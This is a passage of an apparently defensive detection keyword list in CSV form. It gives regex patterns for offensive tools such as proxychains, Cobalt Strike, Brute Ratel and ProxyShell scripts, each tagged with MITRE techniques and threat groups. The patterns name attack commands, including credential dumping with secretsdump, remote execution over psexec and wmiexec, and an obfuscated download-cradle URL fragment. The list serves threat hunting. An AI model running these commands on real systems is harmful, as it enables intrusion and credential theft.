"*Proxy Shellcode Handler*",".{0,1000}Proxy\sShellcode\sHandler.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/AggressiveProxy","1","0","N/A","N/A","10","10","141","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z","55620"
"*proxy.py --dns * --dns_port  * --clients*",".{0,1000}proxy\.py\s\-\-dns\s.{0,1000}\s\-\-dns_port\s\s.{0,1000}\s\-\-clients.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","0","N/A","N/A","10","10","410","63","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z","55621"
"*proxy_bypass.py*",".{0,1000}proxy_bypass\.py.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","55622"
"*proxy_cmd_for_exec_by_sibling*",".{0,1000}proxy_cmd_for_exec_by_sibling.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","55623"
"*proxy_linux_amd64*",".{0,1000}proxy_linux_amd64.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow.  which allows to transparently proxy multi-domain destination traffic.  both TLS and non-TLS.  over a single domain.  without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/drk1wi/Modlishka","1","1","#linux","network exploitation tool","5","10","4967","897","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z","55624"
"*proxychains -*",".{0,1000}proxychains\s\-.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55625"
"*proxychains atexec.py*",".{0,1000}proxychains\satexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55626"
"*proxychains cme smb*",".{0,1000}proxychains\scme\ssmb.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55627"
"*proxychains dcomexec.py*",".{0,1000}proxychains\sdcomexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55628"
"*proxychains nmap -sT * -p * -Pn -A*",".{0,1000}proxychains\snmap\s\-sT\s.{0,1000}\s\-p\s.{0,1000}\s\-Pn\s\-A.{0,1000}","offensive_tool_keyword","ligolo","proxychains used with ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","55629"
"*proxychains nmap*",".{0,1000}proxychains\snmap.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55630"
"*proxychains psexec.py*",".{0,1000}proxychains\spsexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55631"
"*proxychains rdesktop *",".{0,1000}proxychains\srdesktop\s.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","55632"
"*proxychains secretsdump*",".{0,1000}proxychains\ssecretsdump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55633"
"*proxychains smbclient -L *",".{0,1000}proxychains\ssmbclient\s\-L\s.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55634"
"*proxychains smbexec.py*",".{0,1000}proxychains\ssmbexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","APT20 - Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55635"
"*proxychains ssh*",".{0,1000}proxychains\sssh.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55636"
"*proxychains telnet*",".{0,1000}proxychains\stelnet.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55637"
"*proxychains wmiexec.py*",".{0,1000}proxychains\swmiexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55638"
"*proxychains*scshell*",".{0,1000}proxychains.{0,1000}scshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","55639"
"*proxychains.conf*",".{0,1000}proxychains\.conf.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55640"
"*proxychains.lsm*",".{0,1000}proxychains\.lsm.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55641"
"*proxychains.sourceforge.net*",".{0,1000}proxychains\.sourceforge\.net.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55642"
"*proxychains_proxy_count*",".{0,1000}proxychains_proxy_count.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55643"
"*proxychains4 -q * smb 1*",".{0,1000}proxychains4\s\-q\s.{0,1000}\ssmb\s1.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#linux","used by Dispossessor ransomware group to scan with crackmapexec an other tools","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55644"
"*proxychains4*",".{0,1000}proxychains4.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","https://x.com/mthcht/status/1827714529687658796","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55645"
"*proxychains-master*",".{0,1000}proxychains\-master.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55646"
"*proxychains-other.conf*",".{0,1000}proxychains\-other\.conf.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55647"
"*ProxyCommand=nc -lp 8080 -s 127.0.0.1*",".{0,1000}ProxyCommand\=nc\s\-lp\s8080\s\-s\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","55648"
"*Proxy-DLL-Loads*",".{0,1000}Proxy\-DLL\-Loads.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55649"
"*proxyDllLoads.c*",".{0,1000}proxyDllLoads\.c.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55650"
"*proxyDllLoads.exe*",".{0,1000}proxyDllLoads\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55651"
"*proxyLogon.py*",".{0,1000}proxyLogon\.py.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/RickGeex/ProxyLogon","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55652"
"*proxyresolv *",".{0,1000}proxyresolv\s.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55653"
"*proxyshell.py*",".{0,1000}proxyshell\.py.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55654"
"*proxyshell_rce.py*",".{0,1000}proxyshell_rce\.py.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A","10","","N/A","","","","55655"
"*proxyshellcodeurl*",".{0,1000}proxyshellcodeurl.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","N/A","10","10","141","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z","55656"
"*proxyshell-enumerate.py*",".{0,1000}proxyshell\-enumerate\.py.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A","10","","N/A","","","","55657"
"*proxyshell-poc*",".{0,1000}proxyshell\-poc.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A","10","","N/A","","","","55658"
"*ps.AddScript(Encoding.UTF8.GetString(Convert.FromBase64String(script)*",".{0,1000}ps\.AddScript\(Encoding\.UTF8\.GetString\(Convert\.FromBase64String\(script\).{0,1000}","offensive_tool_keyword","PS2EXE","Convert Powershell scripts to EXEs","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/PS2EXE","1","0","N/A","N/A","7","1","5","1","2024-08-31T12:34:50Z","2024-08-22T12:22:26Z","55659"
"*ps_token2john.py*",".{0,1000}ps_token2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","55660"
"*ps_wmi_exec.rb*",".{0,1000}ps_wmi_exec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55661"
"*'ps'+':'+'/'+'/'+'cutt.ly/syFzIL*",".{0,1000}\'ps\'\+\'\:\'\+\'\/\'\+\'\/\'\+\'cutt\.ly\/syFzIL.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","55662"
"*PS1ToEXE*PS2EXE.ps1*",".{0,1000}PS1ToEXE.{0,1000}PS2EXE\.ps1.{0,1000}","offensive_tool_keyword","PS2EXE","Convert Powershell scripts to EXEs","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/PS2EXE","1","0","N/A","N/A","7","1","5","1","2024-08-31T12:34:50Z","2024-08-22T12:22:26Z","55663"
"*ps2exe -*",".{0,1000}ps2exe\s\-.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","55664"
"*ps2exe *.ps1*.exe*",".{0,1000}ps2exe\s.{0,1000}\.ps1.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","55665"
